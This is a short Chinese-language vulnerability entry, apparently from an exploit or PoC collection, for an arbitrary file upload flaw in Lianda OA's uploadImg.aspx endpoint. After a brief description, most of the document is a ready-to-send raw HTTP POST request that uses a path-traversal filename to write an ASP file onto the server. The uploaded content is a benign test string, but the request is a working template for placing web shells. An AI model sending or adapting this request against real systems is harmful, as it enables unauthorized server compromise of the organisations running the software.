漏洞描述
联达动力oa是PHPOA推出的新一代OA系统,系统支持性好、安全、数据高速缓存化;支持100+应用自行安装与定义,应用表单自定义,支持应用无代码开发,支持多语言。该系统存在任意文件上传,攻击者可以上传任意文件控制服务器。
联达OA uploadImg.aspx 任意文件上传
PoC代码
POST /Dept_Portal/uploadImg.aspx HTTP/1.1
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 272
Content-Type: multipart/form-data; boundary=00content0boundary00
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
--00content0boundary00
Content-Disposition: form-data; name="DesignId"
1
--00content0boundary00
Content-Disposition: form-data; name="Filedata"; filename="../../../../b11.asp"
Content-Type: image/png
<% Response.Write("Hello, World") %>
--00content0boundary00--